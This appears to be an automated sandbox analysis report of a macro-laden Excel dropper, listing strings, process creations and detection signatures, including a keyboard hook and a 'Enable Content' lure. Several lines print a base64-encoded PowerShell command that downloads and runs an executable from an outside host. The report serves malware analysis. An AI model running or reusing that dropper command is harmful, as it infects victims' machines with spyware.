                      Source: powershell.exe, 00000004.00000002.2103160491.000000000035E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000004.00000002.2103160491.000000000035E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: tNDFx.exe, 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.live
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                      Source: tNDFx.exe, 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmpString found in binary or memory: https://oMAWpB8PlZYBRN.org
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
                      Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                      Source: tNDFx.exe, 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\tNDFx.exeJump to behavior

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Document image extraction number: 1Screenshot OCR: Enable Editing" form the yellow bar and then dick "Enable Content"
                      Source: Document image extraction number: 1Screenshot OCR: Enable Content"
                      Source: Document image extraction number: 3Screenshot OCR: Enable Editing" form the yellow bar and then dick "Enable Content"
                      Source: Document image extraction number: 3Screenshot OCR: Enable Content"
                      Document contains an embedded VBA macro which may execute processesShow sources
                      Source: MV TRIADES.xlsmOLE, VBA macro line: retval = Shell(sssssss)
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\tNDFx.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 6_2_001E9FDC NtSetInformationThread,6_2_001E9FDC
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 6_2_001EA7A0 NtSetInformationThread,6_2_001EA7A0
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0036623011_2_00366230
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0036561811_2_00365618
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_003668B811_2_003668B8
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0036596011_2_00365960
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0036BD6011_2_0036BD60
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_003621CF11_2_003621CF
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0036C2A911_2_0036C2A9
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0036238911_2_00362389
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0036676811_2_00366768
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_007D089811_2_007D0898
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_007D004811_2_007D0048
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0086909811_2_00869098
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0086D8A011_2_0086D8A0
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0086004811_2_00860048
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0086B85011_2_0086B850
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_008685C011_2_008685C0
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00869BC811_2_00869BC8
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0086F51011_2_0086F510
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0086332811_2_00863328
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_0086821011_2_00868210
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00863A5011_2_00863A50
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00866D9811_2_00866D98
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00865B1011_2_00865B10
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00869B2811_2_00869B28
                      Source: MV TRIADES.xlsmOLE, VBA macro line: Public Sub Workbook_Open()
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
                      Source: MV TRIADES.xlsmOLE indicator, VBA macros: true
                      Source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\tNDFx.exe-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb
                      Source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\tNDFx.exeualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpBinary or memory string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbx
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSM@15/10@3/3
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$MV TRIADES.xlsmJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD0D5.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................x.............W.a.i.t.i.n.g. .f.o.r. .1.....l.......-t......................0...............H...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............H.......J.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............................Ku......................e. .............H..........................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............................xw......................e. .............H..........................s....Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: MV TRIADES.xlsmVirustotal: Detection: 44%
                      Source: MV TRIADES.xlsmReversingLabs: Detection: 42%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe 'C:\Users\user\AppData\Roaming\tNDFx.exe'
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exe
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUAJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUAJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe 'C:\Users\user\AppData\Roaming\tNDFx.exe' Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                      Source: MV TRIADES.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
                      Source: MV TRIADES.xlsmInitial sample: OLE zip file path = xl/media/image2.png
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: (PinLC:\Windows\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: Npdbsic.pdb source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.exe-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4tNDFx.PDB424491E3931}\Servererver32 source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: bc.pdbCESSO source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\tNDFx.exeualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmp
                      Source: Binary string: @micC:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbx source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp
                      Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdbX source: tNDFx.exe, 00000006.00000002.2134101883.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: @nptnVisualBasic.pdb\ source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2109637901.0000000002AB0000.00000002.00000001.sdmp
                      Source: Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp

                      Data Obfuscation:

                      barindex
                      Binary contains a suspicious time stampShow sources
                      Source: initial sampleStatic PE information: 0x9FB74E9D [Sun Nov 29 18:42:37 2054 UTC]
                      Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
                      Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ThisWorkbookName: ThisWorkbook
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 11_2_00361C15 push ebx; iretd 11_2_00361C52
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\tNDFx.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
